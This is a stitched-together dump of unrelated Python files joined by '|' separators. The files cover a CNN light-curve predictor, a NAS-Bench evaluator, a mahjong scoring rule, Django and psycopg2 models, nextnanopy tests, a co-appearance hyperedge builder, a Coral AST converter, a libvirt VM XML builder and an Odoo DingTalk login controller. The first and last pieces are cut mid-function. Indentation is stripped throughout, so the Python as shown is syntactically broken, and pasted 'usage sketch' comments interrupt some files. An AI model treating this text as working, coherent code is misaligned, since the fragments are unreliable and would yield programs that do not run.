loc = [int(i-cad_pad), int(i+cad_pad)]
f = lc[loc[0]:loc[1]]
t = time[loc[0]:loc[1]]
reshaped_data[i] = f
reshaped_data = reshaped_data.reshape(reshaped_data.shape[0],
reshaped_data.shape[1], 1)
preds = model.predict(reshaped_data)
preds = np.reshape(preds, (len(preds),))
predictions.append(preds)
self.predict_time = np.array(pred_t)
self.predict_flux = np.array(pred_f)
self.predict_err = np.array(pred_e)
self.predictions = np.array(predictions)
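# Hedged usage sketch (not called anywhere in this module): how the class above
# is typically driven, assuming `ds` is an already-prepared stella.DataSet and
# the output directory exists.
def _example_usage(ds, out_dir='./stella_output'):
    cnn = ConvNN(output_dir=out_dir, ds=ds)
    cnn.train_models(seeds=[2, 3], epochs=50, save=True)  # writes ensemble_*.h5 and tables
    return cnn.val_pred_table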
|
from nasbench import api
import deep_architect.core as co
import deep_architect.contrib.misc.search_spaces.tensorflow_eager.nasbench_space as nb
INPUT = 'input'
OUTPUT = 'output'
node_op_names = {
'conv1': 'conv1x1-bn-relu',
'conv3': 'conv3x3-bn-relu',
'max3': 'maxpool3x3'
}
class NasbenchEvaluator:
def __init__(self, tfrecord_file, num_nodes_per_cell, epochs):
self.nasbench = api.NASBench(tfrecord_file)
self.num_nodes_per_cell = num_nodes_per_cell
self.epochs = epochs
self.ssf = nb.SSF_Nasbench()
"""
Preconditions: inputs and outputs should be unspecified. vs should be
the full hyperparameter value list
"""
def eval(self, vs):
_, outputs = self.ssf.get_search_space()
node_ops = [None] * self.num_nodes_per_cell
node_ops[0] = INPUT
node_ops[-1] = OUTPUT
matrix = [[0] * self.num_nodes_per_cell
for _ in range(self.num_nodes_per_cell)]
for i, h in enumerate(
co.unassigned_independent_hyperparameter_iterator(outputs)):
h_name = h.get_name().split('-')[-2]
if 'node' in h_name:
node_num = int(h_name.split('_')[-1])
node_ops[node_num + 1] = node_op_names[vs[i]]
elif 'in' in h_name:
h_name = h_name.split('_')
matrix[int(h_name[1])][int(h_name[2])] = vs[i]
h.assign_value(vs[i])
model_spec = api.ModelSpec(matrix=matrix, ops=node_ops)
data = self.nasbench.query(model_spec, epochs=self.epochs)
return data
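# Hedged usage sketch (kept commented; the tfrecord filename is a placeholder and
# `vs` must follow the search space's hyperparameter ordering):
# evaluator = NasbenchEvaluator('nasbench_only108.tfrecord',
#                               num_nodes_per_cell=7, epochs=108)
# data = evaluator.eval(vs)  # NAS-Bench-101 query result (accuracy, training time, ...)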
|
# -*- coding: utf-8 -*-
from mahjong.constants import TERMINAL_INDICES
from mahjong.hand_calculating.yaku import Yaku
from mahjong.utils import is_chi
class Junchan(Yaku):
"""
Every set must have at least one terminal, and the pair must be of
a terminal tile. Must contain at least one sequence (123 or 789).
Honours are not allowed
"""
def __init__(self, yaku_id=None):
super(Junchan, self).__init__(yaku_id)
def set_attributes(self):
self.tenhou_id = 33
self.name = 'Junchan'
self.english = 'Terminal In Each Meld'
self.japanese = '純全帯么九'
self.han_open = 2
self.han_closed = 3
self.is_yakuman = False
def is_condition_met(self, hand, *args):
def tile_in_indices(item_set, indices_array):
for x in item_set:
if x in indices_array:
return True
return False
terminal_sets = 0
count_of_chi = 0
for item in hand:
if is_chi(item):
count_of_chi += 1
if tile_in_indices(item, TERMINAL_INDICES):
terminal_sets += 1
if count_of_chi == 0:
return False
return terminal_sets == 5
|
pa = int(input("Enter the first term of the arithmetic progression: "))
ra = int(input("Enter the common difference of the arithmetic progression: "))
soma = pa
for c in range(1, 11):
print(c, "° = ", soma)
soma = soma + ra
|
from paises import Sulamericanos
from paises import Europeus
def main(args):
sul = Sulamericanos()
sul.print_paises()
eu = Europeus()
eu.print_paises()
return
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
|
from config.bank_config import BankConfig
from helper.enum_definitions import AmountFormatEnum
"""
It is possible to read this configuration from a JSON file,
but for simplicity it is constructed as a Python object here.
"""
BanksConfigDict = {
"bank1": BankConfig.default("bank1").update(
DateExpr = r"%b %d %Y", # Oct 1 2019
DatetimeFieldName = "timestamp",
TxdFieldName = "type"
),
"bank2": BankConfig.default("bank2").update(
DateExpr = r"%d-%m-%Y", # 03-10-2019
AmountFieldName = "amounts"
),
"bank3": BankConfig.default("bank3").update(
DateExpr = r"%d %b %Y", # 5 Oct 2019
DatetimeFieldName = "date_readable",
AmountFormat = AmountFormatEnum.Split,
AmountIntegerFieldName = "euro",
AmountFractionFieldName = "cents",
TxdFieldName = "type",
),
}
|
from django.db import models
class APFund(models.Model):
event = models.ForeignKey('Event', on_delete=models.CASCADE)
contribution = models.PositiveIntegerField(default=0)
notes = models.CharField(max_length=200)
last_updated = models.TimeField(auto_now=True)
|
import unittest
from nextnanopy import commands
from nextnanopy.utils.formatting import _path, _bool
import os
folder_nnp = os.path.join('tests', 'datafiles', 'nextnano++')
folder_nn3 = os.path.join('tests', 'datafiles', 'nextnano3')
folder_negf = os.path.join('tests', 'datafiles', 'nextnano.NEGF')
folder_msb = os.path.join('tests', 'datafiles', 'nextnano.MSB')
class TestCommands(unittest.TestCase):
def test_commands_nnp(self):
self.maxDiff = None
inputfile = os.path.join(folder_nnp, 'example.in')
exe = os.path.join('nextnano++', 'bin 64bit', 'nextnano++_Intel_64bit.exe')
license = os.path.join(r'nextnanopy\License', 'License_nnp.lic')
database = os.path.join('nextnano++', 'Syntax', 'database_nnp.in')
outputdirectory = r'tests\datafiles'
threads = 4
cmd = f'"{exe}" --license "{license}" --database "{database}" --threads {threads} --outputdirectory "{outputdirectory}" --noautooutdir "{inputfile}"'
kwargs = dict(inputfile=inputfile, exe=exe, license=license, database=database, outputdirectory=outputdirectory,
threads=threads)
from nextnanopy.nnp.defaults import command_nnp
self.assertEqual(command_nnp(**kwargs), cmd)
self.assertEqual(commands.command(**kwargs), cmd)
def test_commands_nn3(self):
self.maxDiff = None
inputfile = os.path.join(folder_nn3, 'example.in')
exe = os.path.join('nextnano++', 'bin 64bit', 'nextnano++_Intel_64bit.exe')
license = os.path.join(r'nextnanopy\License', 'License_nnp.lic')
database = os.path.join('nextnano++', 'Syntax', 'database_nnp.in')
outputdirectory = r'tests\datafiles'
threads = 4
debuglevel = 0
cancel = -1
softkill = -1
cmd = f'"{exe}" -license "{license}" -inputfile "{inputfile}" -database "{database}" -threads {threads} -outputdirectory "{outputdirectory}" -debuglevel {debuglevel} -cancel {cancel} -softkill {softkill}'
kwargs = dict(inputfile=inputfile, exe=exe, license=license, database=database, outputdirectory=outputdirectory,
threads=threads, debuglevel=debuglevel, cancel=cancel, softkill=softkill)
from nextnanopy.nn3.defaults import command_nn3
self.assertEqual(command_nn3(**kwargs), cmd)
self.assertEqual(commands.command(**kwargs), cmd)
def test_commands_negf(self):
self.maxDiff = None
inputfile = os.path.join(folder_negf, 'example.xml')
exe = os.path.join('nextnano.NEGF', 'nextnano.NEGF.exe')
license = os.path.join(r'License', 'License_nnQCL.lic')
database = os.path.join('nextnano.NEGF', 'Material_Database.xml')
outputdirectory = r'tests\datafiles'
threads = 4
cmd = f'"{exe}" "{inputfile}" "{outputdirectory}" "{database}" "{license}" -threads {threads}'
kwargs = dict(inputfile=inputfile, exe=exe, license=license, database=database, outputdirectory=outputdirectory,
threads=threads)
from nextnanopy.negf.defaults import command_negf
self.assertEqual(command_negf(**kwargs), cmd)
self.assertEqual(commands.command(**kwargs), cmd)
def test_commands_msb(self):
from nextnanopy.msb.defaults import command_msb
self.maxDiff = None
inputfile = os.path.join(folder_msb, 'example.xml')
exe = os.path.join('nextnano.MSB', 'nextnano.MSB.exe')
license = os.path.join(r'License', 'License_nnMSB.lic')
database = os.path.join('nextnano.MSB', 'Materials.xml')
outputdirectory = r'tests\datafiles'
debug = 0
cmd = f'"{exe}" -inputfile "{inputfile}" -license "{license}" -database "{database}" -outputdirectory "{outputdirectory}"'
kwargs = dict(inputfile=inputfile, exe=exe, license=license, database=database, outputdirectory=outputdirectory,
debug=debug)
self.assertEqual(command_msb(**kwargs), cmd)
self.assertEqual(commands.command(**kwargs), cmd)
debug = 1
cmd = f'"{exe}" -inputfile "{inputfile}" -license "{license}" -database "{database}" -outputdirectory "{outputdirectory}" -debug 1'
kwargs = dict(inputfile=inputfile, exe=exe, license=license, database=database, outputdirectory=outputdirectory,
debug=debug)
self.assertEqual(command_msb(**kwargs), cmd)
self.assertEqual(commands.command(**kwargs), cmd)
def test_path(self):
self.assertEqual(_path('aa\nb.test'), '"aa\nb.test"')
self.assertEqual(_path('aa\nb'), '"aa\nb"')
self.assertEqual(_path(''), '')
self.assertEqual(_path(2), '"2"')
self.assertEqual(_path(None), None)
def test_execute(self):
self.assertRaises(ValueError, commands.execute, inputfile='', exe='', license='', database='',
outputdirectory='')
self.assertRaises(ValueError, commands.execute, inputfile=r'test\datafiles', exe='', license='', database='',
outputdirectory='')
def test_bool(self):
self.assertEqual(_bool(''), False)
self.assertEqual(_bool(None), False)
self.assertEqual(_bool('1'), True)
self.assertEqual(_bool('0'), True)
self.assertEqual(_bool(0), True)
self.assertEqual(_bool(1), True)
if __name__ == '__main__':
unittest.main()
|
import datetime
from app.api.v2.utils.db_connection import connect
from psycopg2.extras import RealDictCursor
from instance.config import app_config
# from manage import Database
import psycopg2
import os
# db = Database()
environment = os.environ["APP_SETTINGS"]
DATABASE_URL = app_config[environment].DATABASE_URL
class Meetups():
"""This class holds data for all meetups"""
def create_meetup(self, location=None, topic=None, happeningOn=None):
"""Model for posting a meetup"""
createdOn = datetime.datetime.now().strftime("%y-%m-%d-%H-%M")
with connect() as connection:
with connection.cursor(cursor_factory=RealDictCursor) as cursor:
cursor.execute("INSERT INTO meetups (createdOn, location, topic, happeningOn) VALUES(%s,%s,%s,%s) RETURNING meetup_id, location, topic", (
createdOn, location, topic, happeningOn))
result = cursor.fetchone()
return result
def check_meetup(self, topic):
'''Get meetup by topic'''
try:
with connect() as connection:
with connection.cursor(cursor_factory=RealDictCursor) as cursor:
cursor.execute(
"SELECT * FROM meetups WHERE topic = %s", (topic,))
result = cursor.fetchone()
return result
except psycopg2.Error:
return None
def get_all_meetups(self):
"""Get all meetups"""
with connect() as connection:
with connection.cursor(cursor_factory=RealDictCursor) as cursor:
cursor.execute("SELECT * FROM meetups")
result = cursor.fetchall()
return result
def get_specific_meetup(self, meetup_id):
"""Get meetup by meetup_id"""
with connect() as connection:
with connection.cursor(cursor_factory=RealDictCursor) as cursor:
cursor.execute(
"SELECT * FROM meetups WHERE meetup_id = %s", (meetup_id,))
result = cursor.fetchone()
return result
def delete_meetup(self, meetup_id):
"""Delete all meetups"""
with connect() as connection:
with connection.cursor(cursor_factory=RealDictCursor) as cursor:
cursor.execute(
"DELETE FROM meetups WHERE meetup_id = %s", (meetup_id,))
|
import os
class Processor:
def __init__(self, node_coappearance_file_name):
hyperedge_file_name = "hyperedges.csv"
print "Processing file " + node_coappearance_file_name
self.process_node_coappearance_file(node_coappearance_file_name, hyperedge_file_name)
def dict_to_string(self, D):
pairs = sorted(D.iteritems(), key = lambda ele: ele[0])
return ", ".join(map(lambda ele: ele[0].encode("utf-8") + ":" + str(ele[1]), pairs))
## Read the co-appearance file. Each line of the file should look like:
# a:1, b:2, c:3
# where the ":count" part is optional (a missing count defaults to 1).
# Each line is read as a dictionary.
# Different lines may have identical key sets, in which case those lines are merged.
# The final result is stored in self.all_node_counts.
# The keys of self.all_node_counts are the node sets, and the values are the merged node_count dictionaries.
def process_node_coappearance_file(self, node_coappearance_file_name, hyperedge_file_name):
assert(os.path.exists(node_coappearance_file_name))
self.all_node_counts = dict()
reader = open(node_coappearance_file_name, "r")
for (index, string) in enumerate(reader):
a = string.decode("utf-8").strip("\n").split(", ")
node_counts = dict()
for i in range(len(a)):
b = a[i].split(":")
if len(b) == 1:
weight = 1.0
else:
weight = float(b[1])
node_counts[b[0]] = weight
keys = ",".join((sorted(node_counts.keys())))
if keys in self.all_node_counts:
self.all_node_counts[keys].append(node_counts)
else:
self.all_node_counts[keys] = [node_counts]
reader.close()
def merge_node_counts(node_counts_list):
result = dict()
for i in range(len(node_counts_list)):
keys = node_counts_list[i]
for key in keys:
if key in result:
result[key] += node_counts_list[i][key]
else:
result[key] = node_counts_list[i][key]
return result
keys = self.all_node_counts.keys()
for key in keys:
node_counts_list = self.all_node_counts[key]
if len(node_counts_list) > 0:
self.all_node_counts[key] = merge_node_counts(node_counts_list)
def get_max_frequency(D):
a = list(D.iteritems())
return max(map(lambda ele: ele[1], a))
writer = open(hyperedge_file_name, "w")
pairs = sorted(self.all_node_counts.iteritems(), key = lambda ele: get_max_frequency(ele[1]), reverse = True)
for i in range(len(pairs)):
if len(pairs[i][1]) > 1:
writer.write(self.dict_to_string(pairs[i][1]) + "\n")
writer.close()
def read_aliases(alias_file_name, character_list_file_name):
aliases = dict()
assert(os.path.exists(alias_file_name))
assert(os.path.exists(character_list_file_name))
reader = open(alias_file_name, "r")
for (index, string) in enumerate(reader):
a = string.strip("\n").decode("utf-8").split(":")
name = a[0]
alias_names = a[1].split(",")
aliases[name] = alias_names
reader.close()
reader = open(character_list_file_name, "r")
for (index, string) in enumerate(reader):
name = string.strip("\n").decode("utf-8")
if name in aliases:
continue
aliases[name] = []
reader.close()
return aliases
def get_scenes(content_list_file_name, aliases, output_file_name, iprint = False):
reader = open(content_list_file_name, "r")
content_list = reader.readlines()
reader.close()
content_list = map(lambda line: line.strip("\n"), content_list)
corpus = []
for i in range(len(content_list)):
#number = int(content_list[i].split("/")[-1].split(".")[0].split("_")[-1])
#if number > 80:
# continue
reader = open(content_list[i], "r")
lines = reader.readlines()
reader.close()
corpus += map(lambda line: line.strip("\n").decode("utf-8"), lines)
names = aliases.keys()
alias_is_subname = dict()
for name in names:
alias_names = aliases[name]
for alias_name in alias_names:
if alias_name in name:
alias_is_subname[name] = True
break
if name not in alias_is_subname:
alias_is_subname[name] = False
def step_function(x):
if x > 0:
return 1
return 0
if iprint:
writer = open("all_paragraphs.txt", "w")
scenes = []
for paragraph in corpus:
character_appearance_times = dict()
for name in names:
if name in paragraph:
counter = paragraph.count(name)
if alias_is_subname[name]:
counter = 0
alias_names = aliases[name]
for alias_name in alias_names:
counter += paragraph.count(alias_name)
character_appearance_times[name] = step_function(counter)
else:
alias_names = aliases[name]
found = False
for alias_name in alias_names:
if alias_name in paragraph:
found = True
break
if found:
counter = 1
for alias_name in alias_names:
counter += paragraph.count(alias_name)
character_appearance_times[name] = step_function(counter)
if len(character_appearance_times) > 0:
scenes.append(character_appearance_times)
if iprint:
writer.write(paragraph.encode("utf-8") + "\n")
keys = character_appearance_times.keys()
for key in keys:
writer.write(key.encode("utf-8") + " : " + str(character_appearance_times[key]) + "\n")
writer.write("\n\n")
if iprint:
writer.close()
writer = open(output_file_name, "w")
for i in range(len(scenes)):
scene = scenes[i]
scene = sorted(scene.iteritems(), key = lambda ele: ele[1], reverse = True)
scene = map(lambda ele: ele[0] + ":" + str(ele[1]), scene)
writer.write((", ".join(scene)).encode("utf-8") + "\n")
writer.close()
def main():
import sys
if len(sys.argv) != 2:
print "content_list_file_name = sys.argv[1]. "
return -1
content_list_file_name = sys.argv[1]
aliases = read_aliases("aliases.dat", "names.dat")
scene_file_name = "scenes.dat"
print "Getting node coappearance times ... "
iprint = True
get_scenes(content_list_file_name, aliases, scene_file_name, iprint)
print "Generating hyperedges ... "
processor = Processor(scene_file_name)
return 0
if __name__ == "__main__":
import sys
sys.exit(main())
|
import ast
import meta
import coral_ast as cast
import coral_types as ct
# Public API
# Turn this on for printing.
verbose = False
def vprint(a):
global verbose
if verbose:
print a
def convert_to_coral_ast(func):
"""
Converts a Python function to a Coral AST.
"""
# A Python AST.
tree = meta.decompiler.decompile_func(func)
vprint(ast.dump(tree))
coral_tree = _generate_coral_ast(tree)
vprint(coral_tree)
return coral_tree
# Hacky: module-level accumulator for vocabularies.
vocabs = []
def extract_vocabularies(coral_tree):
global vocabs
assert isinstance(coral_tree, cast.LabelingFunction)
vocabs = [str(v) for v in coral_tree.vocabs]
def _extract_vocabs(node):
global vocabs
if isinstance(node.ty, ct.VocabType):
vocabs.append(str(node.ty))
coral_tree.walk(_extract_vocabs)
# Uniquify
return list(set(list(vocabs)))
### Private Stuff.
def _generate_coral_ast(node, names={}):
"""
Generates a Coral AST given a Python AST.
"""
if isinstance(node, ast.FunctionDef):
args = [name.id for name in node.args.args]
for arg in args:
names[arg] = cast.VocabLiteral(arg)
body = [_generate_coral_ast(b, names) for b in node.body]
expr = cast.LabelingFunction(body, args)
return expr
if isinstance(node, ast.Return):
return cast.Return(_generate_coral_ast(node.value, names))
if isinstance(node, ast.If):
cond = _generate_coral_ast(node.test, names)
true_branch = _generate_coral_ast(node.body[0], names)
expr = cast.IfThen(cond, true_branch)
vprint(expr)
return expr
if isinstance(node, ast.Compare):
left = _generate_coral_ast(node.left, names)
right = _generate_coral_ast(node.comparators[0], names)
op = node.ops[0]
if isinstance(op, ast.Eq):
expr = cast.Equal(left, right)
vprint(expr)
return expr
elif isinstance(op, ast.Gt):
expr = cast.GreaterThan(left, right)
vprint(expr)
return expr
elif isinstance(op, ast.Lt):
expr = cast.LessThan(left, right)
vprint(expr)
return expr
elif isinstance(op, ast.LtE):
expr = cast.LessThanOrEqual(left, right)
vprint(expr)
return expr
elif isinstance(op, ast.GtE):
expr = cast.GreaterThanOrEqual(left, right)
vprint(expr)
return expr
if isinstance(node, ast.BinOp):
if isinstance(node.op, ast.Add):
expr = cast.Add(_generate_coral_ast(node.left, names), _generate_coral_ast(node.right,
names))
elif isinstance(node.op, ast.Mult):
expr = cast.Multiply(_generate_coral_ast(node.left, names),
_generate_coral_ast(node.right, names))
elif isinstance(node.op, ast.Sub):
expr = cast.Subtract(_generate_coral_ast(node.left, names),
_generate_coral_ast(node.right, names))
vprint(expr)
return expr
if isinstance(node, ast.Name):
if node.id == "True":
expr = cast.TrueLabelLiteral()
elif node.id == "False":
expr = cast.FalseLabelLiteral()
elif node.id == "None":
expr = cast.AbstainLabelLiteral()
else:
expr = names[node.id]
vprint(expr)
return expr
if isinstance(node, ast.Num):
return cast.PythonLiteral(node.n)
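# Hedged usage sketch (Python 2, kept commented because it depends on the meta
# decompiler and coral_ast internals; the labeling function below is arbitrary):
# def lf(x, y):
#     if x == y:
#         return True
#     return None
# tree = convert_to_coral_ast(lf)
# print extract_vocabularies(tree)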
|
# coding: UTF-8
from xml.etree.ElementTree import Element, SubElement
import xml.etree.ElementTree as ET
import uuid
import libvirt
from kvmconnect.base import BaseOpen
class VmGen:
"""
Create VM
parameters:
name: VM (domain) name
cpu:
arch: cpu architecture
nvcpu: number of vcpus
memory: memory size of VM
disk: storage path
cdrom: iso image path
nic:
type: type of NIC
source: host NIC
(mac_addr): mac address
model: nic mode (ex. virtio, e1000, ...)
vnc_password: vnc_password
"""
def __init__(self):
pass
def __call__(self, name, cpu, memory, disk, cdrom, nic, vnc_password):
root = Element('domain', attrib={'type': 'kvm'})
el_name = Element('name')
el_name.text = name
root.append(el_name)
el_memory = Element('memory')
el_memory.text = memory
root.append(el_memory)
el_vcpu = Element('vcpu')
el_vcpu.text = cpu['nvcpu']
root.append(el_vcpu)
# <os>
# <type arch="${arch}">hvm</type>
# <boot dev="cdrom"/>
# <boot dev="hd"/>
# </os>
el_os = Element('os')
el_type = Element('type', attrib={'arch': cpu['arch']})
el_type.text = "hvm"
el_boot1 = Element('boot', attrib={'dev': 'cdrom'})
el_boot2 = Element('boot', attrib={'dev': 'hd'})
el_os.append(el_type)
el_os.append(el_boot1)
el_os.append(el_boot2)
root.append(el_os)
# <features>
# <acpi/>
# <apic/>
# </features>
el_features = Element('features')
el_acpi = Element('acpi')
el_apic = Element('apic')
el_features.append(el_acpi)
el_features.append(el_apic)
root.append(el_features)
# <cpu mode="custom" match="exact">
# <model>IvyBridge</model>
# </cpu>
el_cpu = Element('cpu', attrib={'mode': 'custom', 'match': 'exact'})
el_model = Element('model')
el_model.text = 'IvyBridge'
el_cpu.append(el_model)
root.append(el_cpu)
# <clock offset="utc">
# <timer name="rtc" tickpolicy="catchup"/>
# <timer name="pit" tickpolicy="delay"/>
# <timer name="hpet" present="no"/>
# </clock>
el_clock = Element('clock', attrib={'offset': 'utc'})
el_timer1 = Element('timer', attrib={'name': 'rtc', 'tickpolicy': 'catchup'})
el_timer2 = Element('timer', attrib={'name': 'pit', 'tickpolicy': 'delay'})
el_timer3 = Element('timer', attrib={'name': 'hpet', 'present': 'no'})
el_clock.append(el_timer1)
el_clock.append(el_timer2)
el_clock.append(el_timer3)
root.append(el_clock)
# <on_poweroff>destroy</on_poweroff>
# <on_reboot>restart</on_reboot>
# <on_crash>restart</on_crash>
el_on1 = Element('on_poweroff')
el_on1.text = 'destroy'
el_on2 = Element('on_reboot')
el_on2.text = 'restart'
el_on3 = Element('on_crash')
el_on3.text = 'restart'
root.append(el_on1)
root.append(el_on2)
root.append(el_on3)
# <pm>
# <suspend-to-mem enabled="no"/>
# <suspend-to-disk enabled="no"/>
# </pm>
el_pm = Element('pm')
el_suspend1 = Element('suspend-to-mem', attrib={'enabled': 'no'})
el_suspend2 = Element('suspend-to-disk', attrib={'enabled': 'no'})
el_pm.append(el_suspend1)
el_pm.append(el_suspend2)
root.append(el_pm)
# devices
el_devices = Element('devices')
# <disk type="file" device="disk">
# <driver name="qemu" type="raw"/>
# <source file="${disk}"/>
# <target dev="vda" bus="virtio"/>
# </disk>
el_disk = Element('disk', attrib={'type': 'file', 'device': 'disk'})
el_driver = Element('driver', attrib={'name': 'qemu', 'type': 'raw'})
el_source = Element('source', attrib={'file': disk})
el_target = Element('target', attrib={'dev': 'vda', 'bus': 'virtio'})
el_disk.append(el_driver)
el_disk.append(el_source)
el_disk.append(el_target)
el_devices.append(el_disk)
# <disk type="file" device="cdrom">
# <driver name="qemu" type="raw"/>
# <source file="${cdrom}"/>
# <target dev="hda" bus="ide"/>
# <readonly/>
# </disk>
el_disk = Element('disk', attrib={'type': 'file', 'device': 'cdrom'})
el_driver = Element('driver', attrib={'name': 'qemu', 'type': 'raw'})
el_source = Element('source', attrib={'file': cdrom})
el_target = Element('target', attrib={'dev': 'hda', 'bus': 'ide'})
el_readonly = Element('readonly')
el_disk.append(el_driver)
el_disk.append(el_source)
el_disk.append(el_target)
el_disk.append(el_readonly)
el_devices.append(el_disk)
# <interface type="${type}">
# <source bridge="${source}"/>
# <mac address="${mac_addr}"/>
# <model type="${model}"/>
# </interface>
el_interface = Element('interface', attrib={'type': nic['type']})
el_source = Element('source', attrib={'bridge': nic['source']})
el_model = Element('model', attrib={'type': nic['model']})
el_interface.append(el_source)
if nic['mac_addr']:
el_mac = Element('mac', attrib={'address': nic['mac_addr']})
el_interface.append(el_mac)
el_interface.append(el_model)
el_devices.append(el_interface)
# <input type="mouse" bus="ps2"/>
el_input = Element('input', attrib={'type': 'mouse', 'bus': 'ps2'})
el_devices.append(el_input)
# <graphics type="vnc" port="-1" listen="0.0.0.0" passwd="${vnc_password}"/>
el_graphics = Element('graphics', attrib={'type': 'vnc', 'port': '-1',
'listen': '0.0.0.0', 'passwd': vnc_password})
el_devices.append(el_graphics)
# <console type="pty"/>
el_console = Element('console', attrib={'type': 'pty'})
el_devices.append(el_console)
root.append(el_devices)
self.xml = ET.tostring(root).decode('utf-8').replace('\n', '')
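# Hedged usage sketch (not executed): argument shapes follow the class docstring;
# every concrete value here (paths, bridge name, password) is a placeholder.
def _example_domain_xml():
    gen = VmGen()
    gen(name='testvm',
        cpu={'arch': 'x86_64', 'nvcpu': '2'},
        memory='1048576',  # libvirt interprets a bare <memory> value as KiB
        disk='/var/lib/libvirt/images/testvm.img',
        cdrom='/var/lib/libvirt/images/installer.iso',
        nic={'type': 'bridge', 'source': 'br0', 'mac_addr': None, 'model': 'virtio'},
        vnc_password='secret')
    return gen.xml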
|
# -*- coding: utf-8 -*-
import json
import logging
import werkzeug
from werkzeug.exceptions import BadRequest
from odoo import SUPERUSER_ID, api, http, _, exceptions
from odoo import registry as registry_get
from odoo.addons.auth_oauth.controllers.main import OAuthLogin
from odoo.addons.web.controllers.main import (login_and_redirect, ensure_db, set_cookie_and_redirect)
from odoo.http import request
from odoo.addons.dingtalk_base.tools import dingtalk_tool as dt
_logger = logging.getLogger(__name__)
class DingTalkLogin(OAuthLogin):
@http.route('/web/dingtalk/login', type='http', auth='none', website=True, sitemap=False)
def web_dingtalk_login(self, *args, **kw):
"""
Build the QR-code scan login page
:param args:
:param kw:
:return:
"""
ensure_db()
if not request.session.uid:
return request.render('dingtalk_login.dingtalk_login_signup', kw)
request.uid = request.session.uid
try:
context = request.env['ir.http'].webclient_rendering_context()
response = request.render('web.webclient_bootstrap', qcontext=context)
response.headers['X-Frame-Options'] = 'DENY'
return response
except exceptions.AccessError:
if request.session.uid:
request.session.uid = False
if request.session.login:
request.session.login = False
return request.render('dingtalk_login.dingtalk_login_signup')
@http.route('/web/dingtalk/get/companys', type='http', auth='public', website=True, sitemap=False)
def dingtalk_get_companys(self):
result = {
"company_list": request.env['res.company'].with_user(SUPERUSER_ID).search_read([], ['name', 'id'])
}
return json.dumps(result)
@http.route('/web/dingtalk/get_login_url', type='http', auth="none")
def dingtalk_get_login_url(self, **kw):
"""
Build the DingTalk user-verification URL to redirect the user to
:param kw:
:return:
"""
params_data = request.params.copy()
local_url = params_data.get('local_url')
company_id = int(params_data.get('company_id'))
config = request.env['dingtalk.config'].with_user(SUPERUSER_ID).search([('company_id', '=', company_id)], limit=1)
if not config:
return json.dumps({'state': False, 'error': 'QR-code login is not configured for this company'})
redirect_url = "{}/web/dingtalk/login/redirect".format(local_url)
url = "https://oapi.dingtalk.com/connect/oauth2/sns_authorize?appid={}&response_type=code&scope=" \
"snsapi_login&redirect_uri={}&state={}".format(config.login_id, redirect_url, company_id)
data = json.dumps({'state': True, "encode_url": url, 'callback_url': redirect_url})
return data
@http.route('/web/dingtalk/login/redirect', type='http', auth="none", website=True, sitemap=False)
def web_dingtalk_login_redirect(self, **kw):
"""
Receive the QR-code scan login result returned by DingTalk
:param kw:
:return:
"""
params_data = request.params.copy()
params_data['providers'] = self.list_providers()
_logger.info(">>>钉钉扫码登录返回code参数为:{}".format(params_data.get('code')))
company_id = params_data.get('state')
if not company_id:
params_data['error'] = _("钉钉扫码返回的数据格式不正确,请重试!")
return request.render('web.login', params_data)
try:
company_id = int(company_id)
user_info = dt.get_userinfo_by_code(request, params_data.get('code'), company_id)
_logger.info(">>>用户身份信息:{}".format(user_info))
domain = [('din_unionid', '=', user_info.get('unionid')), ('company_id', '=', company_id)]
employee = request.env['hr.employee'].with_user(SUPERUSER_ID).search(domain, limit=1)
if not employee.user_id:
params_data['error'] = _("员工[{}]未关联系统登录用户,请联系管理员处理!".format(employee.name))
return request.render('web.login', params_data)
else:
return self.dingtalk_employee_login(employee, params_data)
except Exception as e:
params_data['error'] = str(e)
return request.render('web.login', params_data)
def dingtalk_employee_login(self, employee, params_data):
"""
Log the user into the system via the matched employee record
:param employee:
:param params_data:
:return:
"""
ensure_db()
dbname = request.session.db
if not http.db_filter([dbname]):
return BadRequest()
registry = registry_get(dbname)
with registry.cursor() as cr:
try:
env = api.Environment(cr, SUPERUSER_ID, {})
credentials = env['res.users'].with_user(SUPERUSER_ID).auth_oauth('dingtalk_login', employee.ding_id)
cr.commit()
url = '/web'
resp = login_and_redirect(*credentials, redirect_url=url)
if werkzeug.urls.url_parse(resp.location).path == '/web' and not request.env.user.has_group('base.group_user'):
resp.location = '/'
return resp
except Exception as e:
params_data['error'] = "登录时发生错误:{}".format(str(e))
return request.render('web.login', params_data)
class OAuthController(OAuthLogin):
@http.route('/web/dingtalk/auto/login', type='http', auth='public', website=True)
def web_dingtalk_auto_login(self, **kw):
"""
DingTalk auto-login (password-free sign-in) entry point
:param kw:
:return:
"""
ensure_db()
logging.info(">>>用户正在使用免登...")
# if request.session.uid:
# return request.redirect('/web')
# Get the corp_id of the company configured for auto-login
config = request.env['dingtalk.config'].sudo().search([('m_login', '=', True)], limit=1)
if not config:
params_data = request.params.copy()
params_data['providers'] = self.list_providers()
params_data['error'] = "系统没有配置可用于免登的公司!"
return request.render('web.login', params_data)
return request.render('dingtalk_login.dingtalk_auto_login_signup', {'corp_id': config.corp_id})
@http.route('/web/dingtalk/auto/login/action', type='http', auth='none', website=True, sitemap=False)
def web_dingtalk_auto_signin_action(self, **kw):
"""
Fetch the user's info using the obtained auto-login (or temporary) authorization code
:param kw:
:return:
"""
params_data = request.params.copy()
params_data['providers'] = self.list_providers()
logging.info(">>>免登授权码: %s", params_data.get('authCode'))
config = request.env['dingtalk.config'].with_user(SUPERUSER_ID).search([('m_login', '=', True)], limit=1)
client = dt.get_client(request, dt.get_dingtalk_config(request, config.company_id))
try:
result = client.user.getuserinfo(params_data.get('authCode'))
except Exception as e:
params_data['error'] = str(e)
return request.render('web.login', params_data)
domain = [('ding_id', '=', result.userid), ('company_id', '=', config.company_id.id)]
employee = request.env['hr.employee'].with_user(SUPERUSER_ID).search(domain, limit=1)
if not employee:
params_data['error'] = _("员工[{}]未关联系统登录用户,请联系管理员处理!".format(employee.name))
return request.render('web.login', params_data)
_logger.info(">>>员工:{}正在尝试登录系统".format(employee.name))
if not employee.ding_id:
params_data['error'] = _("员工[{}]不存在钉钉ID,请维护后再试!".format(employee.name))
return request.render('web.login', params_data)
if not employee.user_id:
params_data['error'] = _("你还没有关联系统用户,请联系管理员处理!")
return request.render('web.login', params_data)
ensure_db()
dbname = request.session.db
if not http.db_filter([dbname]):
return BadRequest()
registry = registry_get(dbname)
with registry.cursor() as cr:
try:
env = api.Environment(cr, SUPERUSER_ID, {})
credentials = env['res.users'].sudo().auth_oauth('dingtalk_login', employee.ding_id)
cr.commit()
url = '/web'
resp = login_and_redirect(*credentials, redirect_url=url)
